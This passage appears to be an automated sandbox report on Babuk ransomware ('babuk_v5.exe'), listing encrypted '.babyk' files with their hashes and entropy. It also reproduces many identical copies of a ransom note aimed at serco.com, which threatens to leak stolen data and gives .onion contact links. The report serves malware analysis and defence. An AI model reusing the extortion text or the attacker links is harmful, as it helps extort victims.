                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):190
                                                                            Entropy (8bit):6.658274768983386
                                                                            Encrypted:false
                                                                            SSDEEP:3:Vo9Lsg8ZPvub3bsh8DCxXqvMjJvQKZqFuJAHFb+g8KsA72kRn62kN3FTs9LLUxN1:eNyA3AdxLvfZqFuJi1Ww7sB7TyLL0vtn
                                                                            MD5:8E45C9A1B429B0AF2D8621A482B109A8
                                                                            SHA1:8EC8583A07BF8C896905E4A2C7935764C34908DC
                                                                            SHA-256:85C85080C2FC6742439211935099761397251754B133587E11358782C6DEEE59
                                                                            SHA-512:C36B478EAEBCF366C991F4952C7CB0B6290637650DE00023E911BB496E3E0109E2873E58FB4A72A4DBD64D3E8B65F0C8C52A83DC5597F8322AF8DB264D1BF14E
                                                                            Malicious:false
                                                                            Preview: ..km...n./..Il66|j..{.....>9Q...4o,....E.s.[....g...7...:R.Q.... .WJuo...`.!.l.Ynr.!....."6v......+9D.....v.poI....7.f....KD.MR..)y...,.8..U..q.C..6.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):192
                                                                            Entropy (8bit):6.747410417645778
                                                                            Encrypted:false
                                                                            SSDEEP:3:A9nEmto/YnMz1G/apy3Q1DZ4eyt1HJsRnlU+iymWxWJ8mRXSKSUxNvEEn:mto/KZ/R3walt1HR+dmWxWJ8mRXSf0vt
                                                                            MD5:0A756747234E917BDB71BB02FA166336
                                                                            SHA1:F009F61651E718E1B9D9B98645CDE523C3452B74
                                                                            SHA-256:802A8C8C4EF47304C2C27C794397AE98CEA268A188899B9EE98830BF3500912B
                                                                            SHA-512:E18A668D7079673447A9B4747D8BECC9BA57963DC985EA107686FDE1714A28FFB1018723CC8283D0FFED6A8409E3CA2E8716DC3DAC835A7D3CC646BEC458F5B9
                                                                            Malicious:false
                                                                            Preview: ...y.u#.....a.L.*.yBX".o....'.....oP.d.5..2q)....>..?.....m.Q.....M"..g^)...:..._..{.MfM...G.."..m.V!...6...,...J...........q...j...l.J$.4......Qj.H.+.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):805
                                                                            Entropy (8bit):7.7376756803634335
                                                                            Encrypted:false
                                                                            SSDEEP:12:L6nKmjQapeQD5wE1LGOl64CQ6aI5v++y2ZjzDwgstpBjJksglIAHGUA710pDooa/:L6KKQaphVlGxQO5fl9JstnjGP8371AKb
                                                                            MD5:2C730B60806455F3A1F0DF6058D79FF8
                                                                            SHA1:03FBA23206D8321B8939167D4132DF2CD20D1B59
                                                                            SHA-256:F803905FAD25793B649198FAC63867C1E50695590873242EE961D002F7126AE3
                                                                            SHA-512:A5F8BF4846F60BD0E61B92517B648F9C77F859032C64470F49CBB1EDB75FAB90281F75948AD1C475005455E3B38D95B95088883C2420EFFD9702AC891E7100E6
                                                                            Malicious:false
                                                                            Preview: ..nV...S...^..5..q.^.5...p....W. '..1.Q....v....h-..H.b.......n.z1...i.....x.4..Q.{....k..6.[.......OY4.!...%............h/....^......:..@R......M......m..f...nm..n....5:....Z.VnH....k.ut.~..P..ac...;F..,....|JzTZK.$..m.j.........~._Z7.9..8..y..wa..w:.....8.k......j0.Q..1...>z.gw..m.gQ.}..J..2.W'...IkY..$........."/.:...g..okH../...9*....-....Z.T.&.\#...HN....../....n`N...;h.W.8!.$....6.K..IIUx.....1.?5....=.F...{/..F.ZDc.....Z..q....]..tyW........IU.6..%z4...'..q..y`..#(..\.s(..#..X.K~..>........z.p.?..la....N9.sY.0.KU...2.H....W"."..0p*..........--....9.........7..A=.6.......T..`..+(Y.0qd...X.....Q@)w....Z-..h+......._*#].u..}.l...~:.,4.....,...j..>...m..:...q...y.(/.-M.".x.....~1. bO.<.(.+......>T.u....Nw+.\.\...h......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):593
                                                                            Entropy (8bit):7.61889722431374
                                                                            Encrypted:false
                                                                            SSDEEP:12:3CDMDg7E1WxIOPxg+KFQ0aXOv9c49mGFfmIMi07s+ws:QX7sfOPxbKFQk7fm3l7Qs
                                                                            MD5:091DB780D183342AD2FB28A65CC11DD7
                                                                            SHA1:76F39F1717E0DE0084E747258C0E38C875DC2A7A
                                                                            SHA-256:841DA874F9D76505923512ED80F607C629D813D283B9CC06D75800FF5AA3DDB7
                                                                            SHA-512:1AC3FF77A3EAE23C1A5E46B75CC5C1C139C8B3099B8BE22ED1C52C9AB3F9B3042CF32894851F5A8D7C5253857E303A64FA12F2D87829AFBCABF381B0CAD33AA0
                                                                            Malicious:false
                                                                            Preview: r....-..7...B|. ......j.+....1b.*...?.....C.......,L(...*...~.-Q8.=L.%.{.T..M.u i.1.......z8X....O.3~.T?.t.M......E{1=...k..:.V8rF....Q..q....1..b.~...Q.k.G/....Z.E.>:nbw.ce\.....j..O......]GZ@..7.E.....T/...[d.c....d...lM.v...f..^..9#.lO....O.w...)lb..ELq:...).%..J.#.9.BL.H.......4m.@.9u...&...G%v'...0.3w.V..F!Z....;..,.c...b.S...qYV.V..y....g&E0.e.7.p...)BVk"..i8.hM.Il|...y@U.5..|.6...r.c...Q.l.J.|G.H......h....t.O.8D.....L..N....k.zd.....*L..T...K.,."dq..4)......i...N..O.1y.+{.?...}....F.7....\Z<%.%>&`a.1t.`.k..#t.zk&t^Wm....;M....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):10408
                                                                            Entropy (8bit):7.982224965502696
                                                                            Encrypted:false
                                                                            SSDEEP:192:+Y85jUAtrm/uddAdfpQbaKlllO2f3mXWEoVTOAqANMJbBLC5caOybd8rOmke8:l8nUudc6OmJOwCBLkcaOyKBke8
                                                                            MD5:5314935E9AE7CA4B499527684D4AA7DB
                                                                            SHA1:42E78E620299B4D07AC1FB62696C17F85BA9F0B7
                                                                            SHA-256:033A296AF1727B32A699B6EA8E08EB2EA9AD3D9A4A8AC1BB8680915BF811ADF1
                                                                            SHA-512:A94A3F96249C6BF92BF7BA0AB3211C2CA5B0D4A0F4667C7B052E3390B282ADED27B72D2D75EA6A84F3E2AC7EF033F1C89D93EAD46979EF8F0CBE6831DE786231
                                                                            Malicious:false
                                                                            Preview: .(P`.....h1.u..0...a...?....?.....k.........N...q.......I..4.Y..|.Q.[.e~..&c.U>v...;..6h...@;..n.y.'.q!:.H."-..fU!"..../.\..A..5K.F9((..y...v...hn....LH.6....]...h.&<yzc.........@7.P..U.w.`.p..^.H.'.r8{cCf[4r.uc.1.......]p?.....+.B._.i.......j..^b...B.=C...(.e.\.O......Q.....7.C..../..@1....u.,.TjT_c>.".<.u.=...4_....Rq=..<.O.^\-.....CC... .'\H#.@.._;..-"..s..cgV....n../v0~.?.n..<B-.A3Jm..Ud...]..J#.P".."..6.t._.Jh.h{..c.)!_.G].<...4#u...Z)g..0..\..]. ^....IA.......e.@...4'.wb.....rW.....-......^7.+..=L0x..sI|.....j.r.......J).....E...(T.....vk......f.65....%..?...........H.U.*.]...I...2.=...."..G...lU$...aO.R.;...R.?...j..,6I~.07.~%*]o.....(,......cY4..`.s9.....U.....<...E.Ngzj.Y[..4x..Z|...4.. ..h.=.T>s..fV....g.C4w....{.....Y.hM...g.......h...@9 .@..y~ip{.........*3,.x8.....Q..#Bw....0o..q\.?..^....3..%...R{.I?.....x.#.f..3.^..........[M..kf..."W.....5....C......l.V..4v..Q=~O;..w.x71...~.t...3f.QP..Y.QB...>.7..>..5.fS..F....j.
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):24320
                                                                            Entropy (8bit):7.992292710132398
                                                                            Encrypted:true
                                                                            SSDEEP:384:PZB/EHPH9Ow7wCmQd1nxSOEmbKZxlALCJ2Ih5DxU4U/tLeXsYRi3YSELMHNJGyYk:ns9OYwenxTEmGZxKCJ5le9osFZEINJGU
                                                                            MD5:9D3A07707D83E9A53383DF29F157AA61
                                                                            SHA1:91EEA9BBEFDFB4FFFA69DEC9335DD2661ACF448E
                                                                            SHA-256:49AAA45CDF4FB84F7F79342B84DB95B98B0998C1034390FA0FF4C4E6F76E80A1
                                                                            SHA-512:8C45F69CEB81DFFFB155494533901BFF98884EA6DA31BE1FB07BAB065DDA958637BB1415D9906B9420EADB863C9120BF210D7F3E218F9353C02BD582EAD50B6C
                                                                            Malicious:true
                                                                            Preview: ..8y.r..rFf.u...K.3.6e@.]^."...$......\(.....8...a.v..b.!..Z.Uj/d...W."z...?=.B.g&...>;.?......[...%..y.sk?!:...v..X.4b...(.O_d.o......Y~m...n..E..6|yb.>....M{...J......$,k..(..;.ID..CV...~..No(f."."..P*.(....w..E.....T.....i_.%vl@..z._..E....V....2....<.....Bm..B..`L`.....U.^.'.@(.Wj.<..S..?~.9...I...J,.M..U.a,.4sg-Y..._...7..4........(Zg.[;.......L.i."l.tw.mk..!...]..Nh...^.A.Vu5"...:....E.A......m..t.=....b.X.....s..Q....`2.;..q..x..M.h.../../...6!hD_..Y..xw...>....o8zLm.%.@.n./#l.eS.Q.dw.eA...5.UI$.q.Q.^~<..i../[..........<.....y...I..F...jKNr.>%....&.( .?~!.../.i..T....^e.Wx.~.x&J....?.3..../...|..g..o3.LF=..H.5.G........h..Y.....='......!Q#...+..04Oh...=Cf..;G... ...7.f.z.....).$(... ....Y...Cp......~...'l..x...)r.....{{....X.....%....h.rn0./.{R._d....l....-.+.l.Y.4o.'..4..5...C...P..C.lE.dnL]nY.d.........MM..@.l0..NA...s.Z.e...D...cC...l@..{.M..'%.....I....'W.6...d4..2..@..;X.X.H.}......|.o...&7k...u4..+..d..%G.'.....d. Q
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):432
                                                                            Entropy (8bit):7.412419468007256
                                                                            Encrypted:false
                                                                            SSDEEP:12:FFWNO4QAT3e6+0x6/albIetDnb22KrRiGxis:TWw1AT3e6+0x9ttLS2KkGX
                                                                            MD5:CF662337DC8A21D2C3D2D8106ACF6432
                                                                            SHA1:F7B6B87995022516D24131D3E361767E0F6BC8EC
                                                                            SHA-256:6B827E4AAEA97A5C54E8F573CD7E4BFB8D70E51EFC86B72AB0E1EE3B6894A416
                                                                            SHA-512:5286AC9A172E33A4C15A028064B8C7ED7CC4F6BA03D6D525D79F5972951CBF01E10D4EEECC0CEFE9FA609302A6DDD241244E66CA6DE936CC22AF0724FDFAC8DC
                                                                            Malicious:false
                                                                            Preview: s....\../cs.~. k....o..%..].A.o.iQ.(.kRQ...0..]`..'./#u...BV.8..7.,z...L....(#f.Hl.........K.<mX..y?....Q.....q7..!.!Yx".O...oAa..U....|....a.d.MGO....~...q0._.........`....._.....+..t(...XV.W....x.....<~Q..o..=..lT.,.....-..T0.........3.z..o<....V....*.........[..k>X.......3....z.....nI:.~A...L..):L.p.wE.R3..z.0A.p.UJ........ls./=9..p./.[W.?.*BO7.".:..[....U..r!.....~.......:.C....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):14624
                                                                            Entropy (8bit):7.987756009093507
                                                                            Encrypted:false
                                                                            SSDEEP:384:+/PE3jEnK5yMz3iCwIwwdWIdgvTMWklSn8EnWFDGNdkd:+E/1WCK2W9T7PWlG7E
                                                                            MD5:5872C1001D651DBC965355BC535936B3
                                                                            SHA1:906BBCFEA2B642DC28BA9E977EF6A09B68A499CD
                                                                            SHA-256:40586DB96F92169AB711A3887466A0FAC1B93D8AA73AC1405ED9E7323AA1FA4B
                                                                            SHA-512:F386C15BE9059D4A6DC80E0E90A2A0AE13C30BF74787A1BBC1AFC7F5A3677AADBFA09582665D386DB22A52BD8F2F18571FB32BC6ACA003E5DBD97BF8F0CA9BA3
                                                                            Malicious:false
                                                                            Preview: Uk......V.B..G.I9.....u.xT.{...y[}...~.P........Ln-.....6...).k.<..Z..Q..~....D.'.n.`@vm.....[.RQ.u...b........r.\>.="..<Fj5...".wSv......h.e.?...."1y!...'.. ..&w.[..&..).V..DA..3I..U...W....+Q........d}T.....8..1${....Izg..N?..!c~4..5ziC....rF...2...V..<....H.g.G.....}d.q.....%..r.4.".Ud....O...D..HB..>+..l..H.bC#............;L6..P.0n#....A.w.....A{..TDT..0..../.A..8ah-..X. ...p.U....i.X.E..>.LtU..@;..][..\....X&.`...:...{.:....J../....\3.1`.. .?.o.%J..z.8.....$.4.....~Q.p!..hB"..1.......).....b...4.:.}.Vh.0..pq...)....\...qG.|.I..a>......,2.3TK...Q.z.G..a^...U.Q..g.<e.Z.GH...1&.w.7..r...|....i..........l...P...e...*#...V|...t.[i..ZS.D.D93.S,>.T... .|. ...'...U\..I.@.ul....}...o..]..9L.m.*.v..Eo.4..l.Y.^..T..:H........H.E.|.n....J.s'.....`.."..,...I...2.~7.k..-.......,.;..D...._..V.$G....Z/.....hV.!>...@.E.x.7}.....t...F........G.I....7.,J........kR.?..IFP.....X..X."+G.b..u.M.....p.b.t..{....-.K.b......d-.ws.,....n..O_....p...._...^L>`
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Flash Player\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Headlights\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Linguistics\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
